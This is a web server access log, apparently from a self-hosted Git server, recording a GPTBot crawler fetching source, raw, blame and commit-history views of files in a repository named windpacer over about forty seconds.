"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" [Client 74.7.227.38] [Length 9969] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" [Client 74.7.227.38] [Length 9875] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18074] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11787] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 10824] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 10824] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12186] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12228] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" -[17/Feb/2026:14:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" -[17/Feb/2026:14:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" -[17/Feb/2026:14:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" [Client 74.7.227.38] [Length 9872] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" -[17/Feb/2026:14:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" -[17/Feb/2026:14:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" -[17/Feb/2026:14:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" -[17/Feb/2026:14:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" -[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" -[17/Feb/2026:14:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" -[17/Feb/2026:14:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" -[17/Feb/2026:14:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" -[17/Feb/2026:14:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11341] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9450] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9456] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11438] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10784] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10641] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" -[17/Feb/2026:14:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10672] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" -[17/Feb/2026:14:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" -[17/Feb/2026:14:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" -[17/Feb/2026:14:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12868] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" -[17/Feb/2026:14:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18990] [Gzip 10.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" -[17/Feb/2026:14:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11008] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" -[17/Feb/2026:14:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 283446] [Gzip 11.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" -[17/Feb/2026:14:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" -[17/Feb/2026:14:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" -[17/Feb/2026:14:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12384] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" -[17/Feb/2026:14:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" -[17/Feb/2026:14:02:13 +0000] - 200 200 